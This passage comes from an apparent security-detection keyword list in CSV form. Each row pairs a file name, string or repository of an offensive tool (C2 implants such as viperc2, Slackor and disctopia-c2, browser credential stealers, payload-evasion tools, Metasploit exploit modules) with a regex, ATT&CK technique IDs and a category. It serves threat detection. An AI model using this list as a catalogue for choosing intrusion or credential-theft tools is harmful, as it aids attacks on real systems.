T1587","N/A","N/A","N/A","Malware","https://cyberint.com/wp-content/uploads/2022/02/Mars-Stealer-7.png.webp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Discovery_AccountDiscovery_GetNetDomainUser.py*",".{0,1000}Discovery_AccountDiscovery_GetNetDomainUser\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_AccountDiscovery_PowerView.py*",".{0,1000}Discovery_AccountDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration 
tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_ApplicationWindowDiscovery_EnumApplication.py*",".{0,1000}Discovery_ApplicationWindowDiscovery_EnumApplication\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_Microphone_CallInfo.py*",".{0,1000}Discovery_Microphone_CallInfo\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_Microphone_camera.py*",".{0,1000}Discovery_Microphone_camera\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical 
intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_Microphone_record_mic.py*",".{0,1000}Discovery_Microphone_record_mic\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkServiceScanning_ARPScan.py*",".{0,1000}Discovery_NetworkServiceScanning_ARPScan\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" 
"*Discovery_NetworkServiceScanning_NbtScanByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_NbtScanByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkServiceScanning_NextnetByPE.py*",".{0,1000}Discovery_NetworkServiceScanning_NextnetByPE\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkServiceScanning_PingByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PingByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkServiceScanning_PortScanByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PortScanByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkServiceScanning_PortScanWithServiceByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PortScanWithServiceByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_NetworkShareDiscovery_PowerView.py*",".{0,1000}Discovery_NetworkShareDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - 
T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_PermissionGroupsDiscovery_PowerView.py*",".{0,1000}Discovery_PermissionGroupsDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*discovery_port_scan*",".{0,1000}discovery_port_scan.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*Discovery_QueryRegistry_GetDotNetVersions.py*",".{0,1000}Discovery_QueryRegistry_GetDotNetVersions\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - 
T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_QueryRegistry_GetRDPPort.py*",".{0,1000}Discovery_QueryRegistry_GetRDPPort\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_RemoteSystemDiscovery_GetDomainIPAddress.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetDomainIPAddress\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_RemoteSystemDiscovery_GetNetComputer.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetComputer\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - 
T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_RemoteSystemDiscovery_GetNetDomain.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetDomain\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_RemoteSystemDiscovery_GetNetDomainController.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetDomainController\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_SecuritySoftwareDiscovery_ListAVByTasklist.py*",".{0,1000}Discovery_SecuritySoftwareDiscovery_ListAVByTasklist\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet 
penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP.py*",".{0,1000}Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_SystemUserDiscovery_GetLastLoggedOn.py*",".{0,1000}Discovery_SystemUserDiscovery_GetLastLoggedOn\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Discovery_SystemUserDiscovery_GetLoggedOnLocal.py*",".{0,1000}Discovery_SystemUserDiscovery_GetLoggedOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which 
modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Disctopia Backdoor*",".{0,1000}Disctopia\sBackdoor.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*disctopia-c2.git*",".{0,1000}disctopia\-c2\.git.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*disctopia-c2-main.zip*",".{0,1000}disctopia\-c2\-main\.zip.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*DiskCryptor Device Installation Disk*",".{0,1000}DiskCryptor\sDevice\sInstallation\sDisk.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" 
"*DiskCryptor driver*",".{0,1000}DiskCryptor\sdriver.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*DISKCRYPTOR_MUTEX*",".{0,1000}DISKCRYPTOR_MUTEX.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*diskcryptor2john.py*",".{0,1000}diskcryptor2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*DiskCryptor-master*",".{0,1000}DiskCryptor\-master.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*display_privilege_escalation_options(*",".{0,1000}display_privilege_escalation_options\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" 
"*dist*_brc4.x64.o*",".{0,1000}dist.{0,1000}_brc4\.x64\.o.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*dist*_brc4.x86.o*",".{0,1000}dist.{0,1000}_brc4\.x86\.o.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*dist/agent.upx.exe*",".{0,1000}dist\/agent\.upx\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*dist/agent.windows.exe*",".{0,1000}dist\/agent\.windows\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*dist/coercedpotato.cna*",".{0,1000}dist\/coercedpotato\.cna.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*dist/nanorobeus_cs.*",".{0,1000}dist\/nanorobeus_cs\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos 
tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*dist/shadow.exe*",".{0,1000}dist\/shadow\.exe.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*dist\shadow.exe*",".{0,1000}dist\\shadow\.exe.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*dist-packages/tor2web/*",".{0,1000}dist\-packages\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by means of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*ditty/ditty.c*",".{0,1000}ditty\/ditty\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z" "*Dive Shell - Emperor Hacking Team*",".{0,1000}Dive\sShell\s\-\sEmperor\sHacking\sTeam.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - 
T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*diversenok/TokenUniverse*",".{0,1000}diversenok\/TokenUniverse.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*djhohnstein/SharpChromium*",".{0,1000}djhohnstein\/SharpChromium.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*DKMC-master.zip*",".{0,1000}DKMC\-master\.zip.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*DLHell v2.0*",".{0,1000}DLHell\sv2\.0.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*DLHell.py -*",".{0,1000}DLHell\.py\s\-.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" 
"*dlink_central_wifimanager_rce.*",".{0,1000}dlink_central_wifimanager_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*dlink_sharecenter_cmd_exec*",".{0,1000}dlink_sharecenter_cmd_exec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*dlink_telnet_backdoor_userpass*",".{0,1000}dlink_telnet_backdoor_userpass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Dliv3/Venom*",".{0,1000}Dliv3\/Venom.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*DLL Hell - DLL Proxifier/Hijacker*",".{0,1000}DLL\sHell\s\-\sDLL\sProxifier\/Hijacker.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - 